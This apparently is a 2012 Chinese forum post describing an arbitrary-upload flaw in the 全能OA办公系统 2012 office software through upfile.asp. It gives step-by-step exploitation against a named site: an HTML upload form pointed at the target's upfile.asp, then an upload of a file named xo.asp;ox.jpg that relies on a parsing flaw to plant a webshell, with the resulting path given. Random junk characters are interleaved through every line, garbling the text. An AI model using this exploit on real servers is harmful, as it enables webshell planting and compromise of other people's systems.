全能OA办公系统 上传漏洞
5 h1 q* s0 S& A. \; r
. t( x: f' ?' T9 P r系统介绍:
J( A% s% U& e4 ~- k
$ t- A, W! Q! m# ]2 _: h全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
: y0 o) C9 U) ^
1 l2 C; o% y# {/ e主要功能:# g3 s( l) x" F9 ^8 J# _- A
公司通告
6 z/ M' H- S' j+ [工作计划
( v/ Z4 d, B9 c, ?通讯助理 5 A5 w# j' |2 @5 O: n4 D r% |/ [
客户资源
$ y& H" N* p/ |# o, I我的公文 1 O3 [: Q6 I% |& I/ u
公文传阅 " k9 G5 l2 e' N* i. G6 p6 ^- N
公共资源
6 {' f3 [% y/ a) l! {7 J资源预约
2 j) q) x9 ]! F( x# T今日考勤 & M" _9 \( I8 ?- F7 Q5 h1 l, s
个人计划
' x" D6 Y# ~& q0 K# E个人通讯录
9 t% H( U, y* t个人基本档案 . D7 Z$ Y1 P9 T: k+ r
未读邮件 4 R0 B/ r ?" `& B0 q$ [. R. D
发邮件 + k# E* D- B1 r& [- K" U
收件夹
* c: p! w" q6 B& d* h0 `9 e* ~寄件夹 . q& @+ ^- X( g1 m8 t
网络硬盘
; f7 y8 p' }2 M% J0 ?网络会议 , q3 w |9 o( f, b; r, P
网络调查 2 s, G2 i# D; u L5 R
交流论坛
5 d9 l9 J4 m0 G7 n* x' i T$ o* y% M3 A
有兴趣测试的朋友可以下源码看看 G& _5 ?' o- z1 Q3 m/ H! R
8 P3 x2 D/ Q. R2 k% Z3 A源码下载:1 O, Z" a, ~5 F& y' `5 z
' r( _; C* H0 ^ i! |
http://www.mycodes.net/30/4750.htm
- B! x1 o! u, i0 U' W( T" A8 s. E+ w9 l
漏洞介绍:* P0 J& Z$ o0 v
' L; C9 g) J, g
由upfile.asp上传文件漏洞引起
' |$ @6 v* Q3 V6 B" Z
* j" @0 Z4 c, e0 I测试方法:
, ~5 C* ?" u/ c4 F+ k
, \9 |, Z9 ?3 @1 L/ N: A使用名小子上传http://www.itlynn.com/upfile.asp即可
4 u2 |, L+ B0 u% L5 i0 z& q5 F/ Z4 I: R& ^3 M, f% R8 {
如果upfile.asp文件被删除不存在。% Z( z* ]3 M! ?
+ j9 \9 m! Y. P3 T; f
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
, l5 L1 d0 n7 \ B2 o1 n) c3 G5 b: h+ V6 }
如果存在那么将如下代码保存为upfile.html。/ i- z5 ^% J( [& k4 \# T+ R
6 C. D; L; F+ [/ E6 b" G$ ]* p
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
3 i9 ~0 W/ z+ x" l5 R+ s% ~+ a4 c: p! K& ~3 \' r
) `9 ^5 J m2 M% a4 }/ d3 P
/ j7 b3 i& ^* J' e1 T01 <table border='0' align="center" cellpadding="5">
! H7 i1 P/ M: b+ [3 J
7 Y! q3 }7 }+ i' L# ]" @/ P4 H02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
( Y6 T- L7 j1 w/ M, M' M0 {( u7 t ]/ e9 v1 I* y" F7 U
03 <tr>
3 F8 t0 y$ U- }* Z7 Z7 R2 ?* M2 Y% k) V: ?5 G
04 <td>报错:</td> + Y- B2 l/ }+ C! _1 `* b3 Y; M' W
+ k: j4 `2 {6 i( O05 <td><input type='radio' name='errnumber' value='0'>
7 s& }) E2 R# h- \" R/ V$ g
3 p* z; t. E Y4 F06 自动更名 / a: z- w' \" c+ r. t
8 U$ Z! p( `1 h$ ?$ w* }. `9 q9 E
07 <input type='radio' name='errnumber' value='1' checked>
. s1 F- L! |+ E( b# R4 O
% Q2 c6 T9 W+ \. y0 _4 u08 报错方式 3 T: s. ~+ l2 r
! V) s- e) N/ U09 <input type='radio' name='errnumber' value='2'>
7 [& J; V/ E4 E- V) [) k" M! r: G Q4 Y- O6 G
10 直接覆盖</td>
( l3 f$ o) p4 o5 u7 Z
" k' `. K! n A; @11 </tr>
! T4 w% n- t: T7 \, s, S9 N) F0 m9 H7 e9 J* F4 k# {
12 <tr>
% f* g1 }% z* \+ b( `0 w/ S! i. i' d# r/ P
13 <td>主题:</td>
/ j6 ~6 e" r; Z8 N" d+ V/ q$ g U) B# o5 N* m2 o4 o; P) f
14 <td><input type='text' name='filename' size='30'></td>
! l6 u/ c* I6 l- a3 A( H9 ?) k
+ M& l* m" C# i# a0 u9 U15 </tr> . U3 K ?4 f7 c; i! I) P9 g
}# H6 i' {/ n6 m1 F. s1 \0 r: S
16 <tr> + W6 @1 g6 R/ V/ f
( }( ^7 A' S% ?/ h, B' }3 Q2 w
17 <td>文件:</td> 2 {% v' N# E9 e8 [7 m
% \( P* y6 S9 `. w. E- W' c
18 <td><input type="file"name="fruit"size="30"></td> . x- k5 P9 O0 H O' b' U
; i2 a$ \3 i# N+ K( j
19 </tr>
- Q+ n) \, k( s+ \6 F: ~6 d: m. B1 E: N
20 <tr>
+ S# T8 c6 t1 F3 y$ ^' W* n4 J9 K8 N' L0 q6 G; m0 D
21 <td valign='top'>简介:</td> 2 {4 [: }6 D5 z2 B q. t
; w+ s# {, |- H( h6 B5 s1 `
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
/ a0 f- f7 Q6 w( }% ^. }! q2 N) `% g0 d& Q0 w j( l
23 </tr> # ?! ^4 z1 L. d3 l ?2 f6 n' S
$ u$ h4 I& X+ o# L; D% E
24 4 K7 Q- k( q+ ?$ W
- X- _% {" P# r+ f
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
: Q I; f' [8 v! O c/ {; W, k; d6 j' z) @/ S1 A
26 </tr>
4 ^5 R8 K1 L0 v0 R; ~& g/ q6 |8 S
& E9 ^* J3 e. u0 \# W z; \27 </form>
% q6 Q. X( D3 Q3 R1 n6 c
. v3 V; W z0 a7 o3 Z# _' @, N& W0 L然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. v* y3 H9 c, R- j, L4 K4 q: t, ]3 i; z( n2 h( K
# ?6 S S; G$ l# E
0 G; O( p8 O" k; M$ \* Z
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
' T- M( E& G! \: C3 l8 w1 G; y3 n- e. M5 Q) }8 x- V3 C1 {2 G0 t
此漏洞需要配合解析漏洞利用。3 |( x- Y* S( k
# o3 {2 }1 I; T" u) A& _9 z
|
发表于 2012-11-21 13:45:12
收藏
支持
反对